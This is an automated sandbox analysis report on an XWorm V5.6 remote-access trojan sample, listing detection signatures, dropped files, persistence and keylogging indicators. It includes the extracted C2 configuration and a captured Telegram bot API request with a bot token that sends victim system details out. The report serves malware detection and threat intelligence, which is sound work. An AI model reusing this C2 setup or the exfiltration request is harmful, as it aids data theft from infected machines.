Windows Analysis Report
yF21ypxRB7.exe

Overview

General Information

Sample name: yF21ypxRB7.exe
renamed because original name is a hash value
Original sample name: b31d01d8e826ea4773cd7cfdbfca3712287024c03463acb374b5040af27fae71.exe
Analysis ID: 1557207
MD5: 640194b0d51307f362b74fd4a4a1761d
SHA1: 8e623f6ba2c87803f079b85578289359d71c6c90
SHA256: b31d01d8e826ea4773cd7cfdbfca3712287024c03463acb374b5040af27fae71
Tags: exeuser-Chainskilabs
Infos:

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to log keystrokes (.Net Source)
Drops PE files with benign system names
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: yF21ypxRB7.exe Avira: detected
Antivirus detection for URL or domain
Source: perfect-invest.gl.at.ply.gg Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exe Avira: detection malicious, Label: TR/Spy.Gen
Found malware configuration
Source: yF21ypxRB7.exe Malware Configuration Extractor: Xworm {"C2 url": ["perfect-invest.gl.at.ply.gg"], "Port": 61586, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exe ReversingLabs: Detection: 78%
Multi AV Scanner detection for submitted file
Source: yF21ypxRB7.exe ReversingLabs: Detection: 78%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: yF21ypxRB7.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: yF21ypxRB7.exe String decryptor: perfect-invest.gl.at.ply.gg
Source: yF21ypxRB7.exe String decryptor: 61586
Source: yF21ypxRB7.exe String decryptor: <123456789>
Source: yF21ypxRB7.exe String decryptor: <Xwormmm>
Source: yF21ypxRB7.exe String decryptor: XWorm V5.6
Source: yF21ypxRB7.exe String decryptor: USB.exe
Source: yF21ypxRB7.exe String decryptor: %AppData%
Source: yF21ypxRB7.exe String decryptor: svchost.exe
Uses 32bit PE files
Source: yF21ypxRB7.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: yF21ypxRB7.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49978 -> 147.185.221.23:61586
Source: Network traffic Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49984 -> 147.185.221.23:61586
Source: Network traffic Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.7:49699 -> 149.154.167.220:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: perfect-invest.gl.at.ply.gg
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: yF21ypxRB7.exe, type: SAMPLE
Source: Yara match File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.7:49700 -> 147.185.221.23:61586
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /bot7602273147:AAGPHHPgO8DxUDOWK0ZCgtSD_Rua_8wVzrE/sendMessage?chat_id=6589427579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A95B5CEC98776D486C10E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20CO53M%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 147.185.221.23 147.185.221.23
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SALSGIVERUS SALSGIVERUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /bot7602273147:AAGPHHPgO8DxUDOWK0ZCgtSD_Rua_8wVzrE/sendMessage?chat_id=6589427579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A95B5CEC98776D486C10E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20CO53M%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: time.windows.com
Source: global traffic DNS traffic detected: DNS query: perfect-invest.gl.at.ply.gg
Source: yF21ypxRB7.exe, 00000000.00000002.3701617400.00000000028A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: svchost.exe, 00000002.00000002.1366625213.0000027E79813000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.bingmapsportal.comsv
Source: yF21ypxRB7.exe, svchost.exe.0.dr String found in binary or memory: https://api.telegram.org/bot
Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366114410.0000027E79859000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365942027.0000027E7986E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366768678.0000027E79870000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000002.00000003.1365942027.0000027E7986E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366768678.0000027E79870000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000002.00000002.1366755363.0000027E79868000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365994412.0000027E79867000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000002.00000002.1366782396.0000027E79877000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365876022.0000027E79875000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000002.00000003.1366114410.0000027E79859000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000002.00000002.1366755363.0000027E79868000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365994412.0000027E79867000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366644805.0000027E7982B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366644805.0000027E7982B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&
Source: svchost.exe, 00000002.00000003.1365861003.0000027E79855000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365861003.0000027E79855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366061020.0000027E7985D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000002.00000003.1264330890.0000027E79836000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000002.00000002.1366755363.0000027E79868000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365994412.0000027E79867000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366644805.0000027E7982B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366127965.0000027E79848000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000002.00000003.1366127965.0000027E79848000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000002.00000002.1366644805.0000027E7982B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49699 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to log keystrokes (.Net Source)
Source: yF21ypxRB7.exe, XLogger.cs .Net Code: KeyboardLayout
Source: svchost.exe.0.dr, XLogger.cs .Net Code: KeyboardLayout

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: yF21ypxRB7.exe, type: SAMPLE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.yF21ypxRB7.exe.470000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.1245680814.0000000000472000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Code function: 0_2_00007FFAAC5B79C2 0_2_00007FFAAC5B79C2
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Code function: 0_2_00007FFAAC5B0ED9 0_2_00007FFAAC5B0ED9
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Code function: 0_2_00007FFAAC5B6C16 0_2_00007FFAAC5B6C16
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Code function: 0_2_00007FFAAC5B4FDD 0_2_00007FFAAC5B4FDD
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 8_2_00007FFAAC570ED9 8_2_00007FFAAC570ED9
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 10_2_00007FFAAC580ED9 10_2_00007FFAAC580ED9
Sample file is different than original file name gathered from version info
Source: yF21ypxRB7.exe, 00000000.00000000.1245680814.000000000047C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameVmxCheats.exe4 vs yF21ypxRB7.exe
Source: yF21ypxRB7.exe Binary or memory string: OriginalFilenameVmxCheats.exe4 vs yF21ypxRB7.exe
Uses 32bit PE files
Source: yF21ypxRB7.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: yF21ypxRB7.exe, type: SAMPLE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.yF21ypxRB7.exe.470000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1245680814.0000000000472000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: yF21ypxRB7.exe, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: yF21ypxRB7.exe, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: yF21ypxRB7.exe, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: yF21ypxRB7.exe, Settings.cs Base64 encoded string: 'Y3TBMzct0fB6CK9FPYM4ZIecyWQY3Lk9OU5z/LNFURJvaUTnYE30d0gTYCE4UAl8'
Source: svchost.exe.0.dr, Settings.cs Base64 encoded string: 'Y3TBMzct0fB6CK9FPYM4ZIecyWQY3Lk9OU5z/LNFURJvaUTnYE30d0gTYCE4UAl8'
Source: yF21ypxRB7.exe, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: yF21ypxRB7.exe, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: svchost.exe.0.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: svchost.exe.0.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@11/5@3/2
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File created: C:\Users\user\AppData\Roaming\svchost.exe Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Mutant created: \Sessions\1\BaseNamedObjects\vnCrrKpdlb0ooKNR
Source: C:\Users\user\AppData\Roaming\svchost.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File created: C:\Users\user\AppData\Local\Temp\Log.tmp Jump to behavior
Source: yF21ypxRB7.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: yF21ypxRB7.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: yF21ypxRB7.exe ReversingLabs: Detection: 78%
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File read: C:\Users\user\Desktop\yF21ypxRB7.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\yF21ypxRB7.exe "C:\Users\user\Desktop\yF21ypxRB7.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Source: unknown Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: ncryptsslp.dll Jump to behavior
